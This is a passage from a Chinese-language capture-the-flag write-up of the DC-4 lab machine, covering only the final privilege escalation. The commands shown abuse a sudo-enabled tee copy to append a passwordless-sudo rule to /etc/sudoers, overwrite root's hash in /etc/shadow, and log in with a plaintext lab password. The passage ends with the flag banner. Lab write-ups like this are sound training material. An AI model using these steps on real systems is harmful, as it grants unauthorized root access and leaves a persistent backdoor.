teehee提权，直接给用户sudo all nopasswd权限

echo "charles ALL=(ALL) NOPASSWD: ALL" | sudo teehee -a /etc/sudoers

然后修改shadow文件

sudo nano /etc/shadow

将当前用户charles的密码覆盖root账户的密码

root:$6$C7nromw2$HB4uMhUmb.srv.I.Q00bT/SV3fxgphbarSb4A8B0aI6kPGOy6WKrKJk.ckCfMLuO6H4uqGx68ylJcmB5ezJ.r0:17992:0:99999:7:::
.......
charles:$6$C7nromw2$HB4uMhUmb.srv.I.Q00bT/SV3fxgphbarSb4A8B0aI6kPGOy6WKrKJk.ckCfMLuO6H4uqGx68ylJcmB5ezJ.r0:17992:0:99999:7:::

su切换到root ，使用charles的密码^xHhA&hvim0y

charles@dc-4:~$ su root
Password: 
root@dc-4:/home/charles# 

提权成功！读取flag文件

# root@dc-4:~# cat flag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.